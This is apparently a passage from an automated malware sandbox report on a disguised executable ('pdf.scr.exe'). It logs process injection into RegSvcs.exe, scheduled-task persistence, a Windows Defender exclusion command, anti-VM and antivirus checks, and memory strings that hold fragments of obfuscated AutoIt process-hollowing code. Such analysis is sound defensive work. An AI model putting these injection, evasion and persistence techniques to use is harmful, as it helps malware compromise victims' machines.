      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDC642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C17248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FC030 GetProcessHeap,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1F3FF BlockInput,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF9D5 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0D65 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Starts an encoded Visual Basic Script (VBE)
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5A
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de0fe3ac427d61269f,z}
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269f[zj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de03e8ac4574770cjz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fyz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fhz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4f378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c70ae2a444794b787aaca0877a44687555378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175r.ktl<ym
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846da9657f750_51+yz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eeab5f7c770ab38aea25559365ae7f7e49fae
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binaryenc61ef5a7537d6ey
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntunmapviewofsectiond6|y
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user32.dll61ef5a7537d6sy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ndowprocwjy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sssssseplacee838/////ay
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execquery\localhost\ro
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sexemodule61ef5a7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: asmrylen
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iswow64process
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptrde0fe3ac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bufferasmetptr
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binbufferetptrac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreatea7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c71deeb255419xi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll0xn
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex7xg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptr.x|
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_decryptdatad ad\xj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountincsxc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountecjx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_fixreloc adax
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountdecxx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displayname
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_derivekeydx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\tempsk
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~14 ad
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64w64
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea2beba94941
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\temp\k
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majoroperatingsystemver
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majorlinkerversionr<gj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addressofnewexeheader3gc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de1ec28a69*gx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: extendedregisters!gq
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberofsectionsaderxgv
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pointertosymboltable_go
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sizeofoptionalheader
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: flagsvg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segfsig
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seggsbg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segds
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edi@x
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esi@_p
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edxh~
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ecx3a
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seges
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eflags
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segss
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segcs
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @_0fo
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: magic
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spareh
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bool*
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutantx
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msctfime ui
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `\[tp\[t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[t][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ][t ][t0][t@][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s3tt!n
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryoihgsvw.exeder10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [i[pi
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif.n
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifzn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifpn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifin
